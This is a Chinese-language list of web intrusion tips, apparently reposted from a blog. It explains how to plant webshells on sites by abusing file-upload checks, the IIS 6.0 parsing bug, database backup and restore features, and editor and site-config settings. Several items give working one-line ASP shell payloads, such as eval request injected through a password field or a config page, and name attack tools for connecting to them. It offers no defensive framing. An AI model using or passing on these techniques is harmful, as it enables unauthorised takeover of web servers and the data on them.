1.直接上传asp asa jsp cer php aspx htr cdx 格式的***,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg
2.有时上传图片格式的***,居然被程序检测拦截了,右键记事本打开***,在代码最前面加上gif89a,再数据库备份备份成asp格式的***拿下shell。
3.上传图片格式***,复制地址到数据库备份备份成asp格式***,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp; 或 1.asp;jpg
4.上传图片格式***,用抓包工具进行抓包,抓到的信息里面包含了上传路径以及cookie值,再利用明小子的综合上传功能上传asp***即可拿下shell。
5.当后台有数据库备份,但是没有任何上传点的时候,把一句话***插在任意处,再到数据库备份备份成asp格式***,用菜刀连接一句话***即可。
6.当后台存在网站配置,可以在里面增加任意图片格式,例如:asp 这时就可以上传asp格式的***了,有时不成功的话,就增加一个:aaspsp 即可绕过。
7.当页面提示“上传格式不正确[重新上传]”,说明存在上传漏洞,复制地址放到明小子里上传,一般都能成功拿下shell。
8.当数据库备份功能用不了时,如果有数据库恢复的话,可以当作数据库备份一样使用,两者之间的功能以及效果是一样的。
9.一般PHP后台都有可增加目录功能,直接建立个目录,名称写1.asp,内容写脚本***的代码,保存后访问地址即可拿下shell。
10.有些网站前台存在“会员注册”,尝试注册一个账户进去找上传点,直接上传asp或解析漏洞,不行就抓包明小子上传,再者就是尝试一句话***。
11.当后台存在网站配置,在里面插入变异的一句话***:"%><%eval request("x")%><%s="访问路径:inc/config.asp
12.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再上传即可突破拿下shell。
13.登陆后台,点击修改密码---新密码设置为:1":eval request("h")’设置成功后,访问asp/config.asp文件即可,一句话***被写入到这个文件里面了.
14.当用啊D检测注入点,提示SA权限或DB权限的时候,尝试列目录,然后找到网站根目录复制,再点击cmd/上传,直接上传asp脚本***,不行就用差异备份拿shell。
15.在新闻发布、版权信息、留言管理处插入数据库加密的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾,访问路径inc/config.asp,菜刀连接密码:a
16.一般后台都存在ewebeditor编辑器,只要找出绝对路径登录进去,可以在样式管理中增加asa|aasasa 再点击预览进行上传脚本***即可。
18.用火狐浏览器登录后台,再打开双文件上传工具替换上传路径,这时直接将其拖入火狐浏览器里,第一个选jpg图片,第二个选cer***,上传即可突破!
转载于:https://blog.51cto.com/xiaoqin00/1708566